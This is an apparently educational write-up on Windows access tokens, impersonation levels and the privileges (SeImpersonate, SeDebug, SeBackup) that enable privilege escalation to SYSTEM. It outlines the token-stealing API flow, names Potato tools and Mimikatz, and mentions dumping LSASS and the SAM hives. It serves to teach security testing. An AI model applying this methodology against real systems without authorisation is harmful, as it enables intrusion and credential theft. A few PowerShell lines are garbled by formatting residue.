Windows Token Fundamentals

intermediate25 minWriteup

Understanding Windows access tokens

Learning Objectives

  • Understand access tokens
  • Learn token privileges
  • Identify impersonation opportunities
  • Understand service accounts

Windows Access Tokens are the core of Windows security. Every process runs with a token that defines its identity and privileges. Token manipulation attacks allow us to "borrow" or "steal" tokens from other processes, running our code with their identity.

Think of tokens like security badges. Your badge determines which doors you can open and what actions you can perform. If you can clone or borrow a SYSTEM badge, you get SYSTEM access. Token impersonation is the art of badge cloning.

Foundation for Potato Attacks

Understanding tokens is essential for
Related

Potato attacks

. These attacks exploit token impersonation privileges to escalate to SYSTEM.

What Are Access Tokens?

1Access Token Contents:
2├── User SID (Security Identifier)
3│   └── Who you are (S-1-5-21-xxx-xxx-xxx-1001)
4├── Group SIDs
5│   └── Groups you belong to (Administrators, Users, etc.)
6├── Privileges
7│   └── Special abilities (SeImpersonate, SeBackup, etc.)
8├── Owner SID
9│   └── Default owner for created objects
10├── Primary Group SID
11│   └── Default group for created objects
12├── Default DACL
13│   └── Permissions for created objects
14├── Token Type
15│   └── Primary (process) or Impersonation (thread)
16└── Impersonation Level
17    └── How token can be used for impersonation
18 
19Token Types:
20├── Primary Token
21│   └── Assigned to processes
22│   └── Defines process identity
23│   └── Created at logon
24└── Impersonation Token
25    └── Created for thread-level impersonation
26    └── Used by services to act on behalf of clients
27    └── Target for token stealing attacks

Impersonation Levels

1Impersonation Levels (least to most powerful):
2├── SecurityAnonymous
3│   └── Client is anonymous
4│   └── Cannot use token for impersonation
5
6├── SecurityIdentification
7│   └── Can get client identity info
8│   └── Cannot impersonate
9
10├── SecurityImpersonation
11│   └── Can impersonate on LOCAL system
12│   └── Cannot impersonate for network access
13│   └── Good enough for local privesc!
14
15└── SecurityDelegation
16    └── Can impersonate ANYWHERE
17    └── Including network resources
18    └── Most powerful, also most dangerous
19 
20For privilege escalation:
21├── SecurityImpersonation is sufficient
22└── We impersonate locally to get SYSTEM shell

Dangerous Token Privileges

batch
1REM Check your token privileges
2whoami /priv
3 
4REM Example output:
5PRIVILEGES INFORMATION
6----------------------
7Privilege Name                  Description                               State
8=============================== ========================================= ========
9SeImpersonatePrivilege          Impersonate a client after authentication Enabled
10SeAssignPrimaryTokenPrivilege   Replace a process level token             Disabled
11SeBackupPrivilege               Back up files and directories             Disabled
12SeDebugPrivilege                Debug programs                            Disabled

Privileges That Lead to SYSTEM

1Token Privileges for Privilege Escalation:
2 
3SeImpersonatePrivilege:
4├── Can impersonate tokens
5├── Enables Potato attacks (JuicyPotato, PrintSpoofer)
6├── Common on service accounts (IIS, SQL, etc.)
7└── Most important privilege for privesc
8 
9SeAssignPrimaryTokenPrivilege:
10├── Can assign tokens to processes
11├── Create process with another user's token
12└── Similar impact to SeImpersonate
13 
14SeBackupPrivilege:
15├── Can read ANY file (bypass ACLs)
16├── Extract SAM, SYSTEM, SECURITY hives
17├── Dump credentials without admin
18└── Not direct shell, but gets credentials
19 
20SeRestorePrivilege:
21├── Can write ANY file (bypass ACLs)
22├── Replace system binaries
23├── Modify sensitive files
24└── Leads to code execution
25 
26SeDebugPrivilege:
27├── Debug any process
28├── Dump LSASS memory
29├── Inject into privileged processes
30└── Very powerful for credential theft
31 
32SeTakeOwnershipPrivilege:
33├── Take ownership of any object
34├── Then modify ACLs to get access
35└── Indirect path to access
36 
37SeLoadDriverPrivilege:
38├── Load kernel drivers
39├── Kernel-level code execution
40└── Ultimate privilege

SeImpersonate = Likely SYSTEM

If you see SeImpersonatePrivilege enabled, you're very likely one Potato attack away from SYSTEM. This is extremely common on web servers (IIS) and database servers (SQL Server).

Token Stealing Concepts

1Token Stealing Attack Flow:
2 
31. Identify Target Token
4   ├── Find process running as SYSTEM
5   ├── Or service with high privileges
6   └── winlogon.exe, lsass.exe, services.exe
7 
82. Get Handle to Target Process
9   ├── OpenProcess() with appropriate access
10   ├── Requires SeDebugPrivilege for protected processes
11   └── Or find accessible process
12 
133. Duplicate the Token
14   ├── OpenProcessToken() to get token handle
15   ├── DuplicateTokenEx() to create impersonation token
16   └── Now we have a copy of their token
17 
184. Use the Token
19   ├── ImpersonateLoggedOnUser() - become that user
20   ├── CreateProcessWithTokenW() - spawn process as them
21   └── Or SetThreadToken() for current thread
22 
235. Run Payload
24   ├── Our code now runs with stolen identity
25   ├── If we stole SYSTEM token = SYSTEM access
26   └── Full privilege escalation achieved

Service Account Tokens

1Common Service Accounts with Tokens:
2 
3LocalSystem (NT AUTHORITYSYSTEM):
4├── Highest privilege level
5├── Full access to system
6└── Target for all token attacks
7 
8LocalService (NT AUTHORITYLOCAL SERVICE):
9├── Limited privileges
10├── Can access network as anonymous
11└── Less interesting target
12 
13NetworkService (NT AUTHORITYNETWORK SERVICE):
14├── Limited local privileges
15├── Presents computer credentials on network
16├── Often has SeImpersonatePrivilege!
17└── Good target for Potato attacks
18 
19IIS AppPool Accounts:
20├── IIS APPPOOLDefaultAppPool
21├── Usually have SeImpersonatePrivilege
22└── Perfect targets for web server privesc
23 
24SQL Server Accounts:
25├── NT SERVICEMSSQLSERVER
26├── Often SeImpersonatePrivilege
27└── Database servers are common targets

Checking Token Information

batch
1REM Current user's token info
2whoami /all
3 
4REM Just privileges
5whoami /priv
6 
7REM Groups
8whoami /groups
9 
10REM Token of specific process (need SeDebugPrivilege)
11REM Use Process Explorer or handle.exe
12 
13REM Using PowerShell
14Get-Process | Select-Object Name, Id, @{
15    Name=606070;">#a5d6ff;">'UserName'
16    Expression={(Get-WmiObject Win32_Process -Filter 606070;">#a5d6ff;">"ProcessId=$($_.Id)").GetOwner().User}
17}
18 
19REM Find SYSTEM processes
20tasklist /V | findstr /i 606070;">#a5d6ff;">"system"
21 
22REM Check service account
23sc qc ServiceName
24REM Look at SERVICE_START_NAME

Token Impersonation Overview

1Token Impersonation Attacks:
2 
3Potato Family (require SeImpersonatePrivilege):
4├── JuicyPotato    - Windows 7/2008 - 10/2016
5├── RoguePotato    - Windows 10/2019
6├── PrintSpoofer   - Windows 10/2016/2019
7├── SweetPotato    - Combination of techniques
8└── GodPotato      - Newer, more reliable
9 
10All Potato attacks:
11├── Trick Windows into authenticating to us
12├── Capture the authentication token
13├── Impersonate that token
14└── Get SYSTEM shell
15 
16Token Stealing Tools:
17├── Incognito       - List and impersonate tokens
18├── Mimikatz        - token::elevate
19├── Meterpreter     - steal_token, getsystem
20└── Custom exploits - Direct API calls
21 
22Which to Use:
23├── Service account with SeImpersonate? → Potato
24├── Admin with SeDebug? → Token stealing from SYSTEM proc
25├── Meterpreter session? → Built-in commands
26└── No special privileges? → Find another vector

Token Enumeration Methodology

Token Analysis Flow

1
Check Privilegeswhoami /priv - look for dangerous privileges
2
SeImpersonate?If yes, proceed to Potato attacks
3
SeDebug?If yes, can dump lsass or steal tokens
4
SeBackup?If yes, can read SAM/SYSTEM hives
5
Service AccountCheck if running as service account
6
Choose AttackSelect appropriate technique for privileges

Knowledge Check

Quick Quiz
Question 1 of 3

What privilege enables Potato attacks?

Challenges

Token Privilege Audit

Challenge
🌱 beginner

Enumerate your current token privileges and identify any that could lead to privilege escalation.

Need a hint? (4 available)

Key Takeaways

  • Tokens define process/thread identity and privileges
  • SeImpersonatePrivilege enables Potato attacks → SYSTEM
  • Service accounts often have impersonation privileges
  • Always check whoami /priv for escalation paths
  • Web servers and DB servers are common targets
  • Token theft requires understanding impersonation levels